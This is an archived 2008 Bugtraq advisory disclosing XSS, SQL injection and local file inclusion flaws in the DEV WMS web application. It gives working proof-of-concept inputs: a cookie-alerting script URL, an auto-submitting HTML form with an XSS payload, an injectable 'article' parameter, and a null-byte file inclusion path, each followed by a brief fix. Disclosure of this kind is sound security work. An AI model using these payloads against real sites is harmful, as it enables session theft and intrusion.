[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080730183406.7622.qmail@securityfocus.com>
Date: 30 Jul 2008 18:34:06 -0000
From: irancrash@...il.com
To: bugtraq@...urityfocus.com
Subject: DEV WMS Multiple Vulnerabilities
----------------------------------------------------------------
Script : DEV WMS
Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection )
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Script Download : http://dev-wms.sourceforge.net/
----------------------------------------------------------------
XSS Vulnerability 1 :
Variable Sent Method : GET
Vulnerable Variable : session
Address : http://Example.com/?session=">><>><script>alert(document.cookie)</script>
Solution : filter session variable with htmlspecialchars() function ...
----------------------------------------------------------------
Xss Vulnerability 2 :
Variable Sent Method : POST
Vulnerable Variable : kluc
Address : http://Example.com/index.php?session=0&action=search
change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie .
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">
<form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/>
<input type="hidden" name="kluc" value=""'''<>>>><script>alert('xss')</script>">
</form>
</body>
</html>
Solution : filter kluc variable with htmlspecialchars() function ...
----------------------------------------------------------------
SQL Injection :
Method Of Send : GET
Vulnerable Variable : article
Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE]
Solution : Filter danger caracter for article variable ...
----------------------------------------------------------------
Local file inclusion :
Method Of Send : GET
Vulnerable Variable : step
Address : http://Example.com/admin/index.php?start=install&step=file.type%00
Solution : Filter step variable with if function ...
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
Powered by blists - more mailing lists